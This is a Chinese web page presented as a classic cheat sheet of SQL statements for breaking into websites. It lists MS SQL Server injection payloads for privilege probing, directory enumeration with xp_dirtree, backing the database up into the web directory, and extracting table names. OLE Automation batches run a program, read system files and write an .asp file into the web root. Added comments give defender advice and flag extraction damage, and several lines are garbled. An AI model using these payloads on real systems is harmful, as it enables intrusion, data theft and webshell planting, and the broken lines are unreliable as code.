
入侵网站必备Sql语句:(经典语句)

 2008-10-27 16:51:14 来源:WEB开发网   

;insert into temp(id,num1)

exec master.dbo.xp_dirtree c:;-- (xp_dirtree适用权限PUBLIC)

写入表:

语句1:and 1= (SELECT IS_SRVROLEMEMBER(sysadmin));--

语句2:and 1=(SELECT IS_SRVROLEMEMBER (serveradmin));--

语句3:and

1=(SELECT IS_SRVROLEMEMBER(setupadmin));--

语句4:and 1=(SELECT

IS_SRVROLEMEMBER(securityadmin));--

语句5:and 1=(SELECT

IS_SRVROLEMEMBER (securityadmin));--

语句6:and 1=(SELECT

IS_SRVROLEMEMBER(diskadmin));--

语句7:and 1= (SELECT

IS_SRVROLEMEMBER(bulkadmin));--

语句8:and 1=(SELECT

IS_SRVROLEMEMBER (bulkadmin));--

语句9:and 1=(SELECT

IS_MEMBER(db_owner));--

把路径写到表中去:

;create table
dirs(paths varchar(100), id int)--
;insert dirs exec
master.dbo.xp_dirtree c:--
and 0(select top 1 paths from
dirs)--
and 0 (select top 1 paths from dirs where paths not
in(@Inetpub))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree e:web--
and
0(select top 1 paths from dirs1)--

把数据库备份到网页目录:下载

;declare @a sysname; set @a=db_name();backup database @a to
disk=e:webdown.bak;--
and 1=(Select top 1 name from(Select top 12
id,name from sysobjects where xtype=char(85)) T order by id desc)
and
1=(Select Top 1 col_name(object_id(USER_LOGIN),1)
from sysobjects) 参看相关表。
and 1=(select user_id from
USER_LOGIN)
and 0=(select user from USER_LOGIN where
user>1)
-=- wscript.shell example -=-
-- OLE Automation example: sp_oacreate instantiates the wscript.shell COM
-- object into @o, then sp_oamethod invokes its run method with notepad.exe,
-- i.e. the database engine is used to start an operating-system program.
-- The string quotes were lost when this page was extracted, so the text is
-- not valid T-SQL as printed.
-- Defender note: these procedures depend on the 'Ole Automation Procedures'
-- server option (disabled by default since SQL Server 2005) and on EXECUTE
-- permission for sp_OACreate. Keep the option off, run the service under a
-- low-privilege account, and alert on sp_OACreate calls or on changes to
-- that option.
declare @o int
exec
sp_oacreate wscript.shell, @o out
exec sp_oamethod @o,
run, NULL, notepad.exe
-- The same batch on one line, wrapped in a leading ; and a trailing -- so
-- that it rides on an application query as a stacked statement. Bound
-- parameters in the application remove that possibility.
; declare @o int exec sp_oacreate
wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
-- File read through OLE Automation: creates a scripting.filesystemobject,
-- opens c:boot.ini (path separators and quotes were lost in extraction) via
-- opentextfile, and prints the file line by line.
-- @t is declared but never used in this batch.
-- Defender note: a database login should not be able to reach the server's
-- file system this way; the 'Ole Automation Procedures' option being off and
-- no EXECUTE grant on sp_OACreate/sp_OAMethod both block it.
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate scripting.filesystemobject, @o out
exec
sp_oamethod @o, opentextfile, @f out, c:boot.ini, 1
-- First readline; @ret receives the procedure's return code.
exec @ret =
sp_oamethod @f, readline, @line out
-- Loop while the previous readline returned 0, printing each line read.
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, readline, @line out
end
-- File write through OLE Automation: creates a scripting.filesystemobject
-- and calls createtextfile for foo.asp under the IIS web root (path
-- separators and quotes were lost in extraction).
-- The final writeline call is truncated on the page: the text argument is
-- missing, so this batch is incomplete as printed.
-- Defender note: a script file created under the web root by the SQL Server
-- process is a strong compromise indicator. Deny the service account write
-- access to web directories and monitor file creation there.
declare @o int, @f int, @t int, @ret int
exec
sp_oacreate scripting.filesystemobject, @o out
exec
sp_oamethod @o, createtextfile, @f out, c:inetpubwwwrootfoo.asp, 1
exec @ret = sp_oamethod @f, writeline, NULL,
 
-- Demonstration that any registered COM object can be driven through
-- sp_oacreate: it instantiates speech.voicetext, calls register, sets the
-- speed property to 150, calls speak with a text string, then waits five
-- seconds with waitfor delay.
-- "sp _oamethod" below contains a stray space and the string quotes are
-- missing; both look like extraction damage and are left as found.
-- Defender note: the exposure is the same as for the wscript.shell batch.
-- It disappears when 'Ole Automation Procedures' is disabled and the
-- application login has no EXECUTE permission on the sp_OA* procedures.
declare @o int, @ret int
exec sp_oacreate
speech.voicetext, @o out
exec sp _oamethod @o, register, NULL,
foo, bar
exec sp_oasetproperty @o, speed, 150
exec
sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us,
528
waitfor delay 00:00:05
-- The same batch on one line, with a leading ; and a trailing -- so that it
-- runs as a stacked statement after an application query.
; declare @o int, @ret int exec
sp_oacreate speech.voicetext, @o out exec sp_oamethod @o,
register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec
sp_oamethod @o, speak, NULL, all your sequel servers are belong to us,
528 waitfor delay 00:00:05--
xp_dirtree 的适用权限:PUBLIC(默认情况下 public 角色即可执行;加固时可考虑回收 public 对该扩展存储过程的 EXECUTE 权限,并先确认不影响管理工具)
exec
master.dbo.xp_dirtree c:
返回的结果集有两个字段:subdirectory 和 depth。subdirectory 字段是字符型,depth 字段是整型。

create table dirs(paths

varchar(100), id int)

建表:这里建的表与上面 xp_dirtree 的返回结果相对应,字段数量相等、类型相同。

insert dirs exec master.dbo.xp_dirtree c:

只要所建表的字段定义与存储过程返回的字段一致,语句就能够执行,达到把结果写入表的效果,再一步步得到想要的信息。这也说明 Web 应用所用的数据库账户不应拥有建表权限,也不应能执行扩展存储过程。
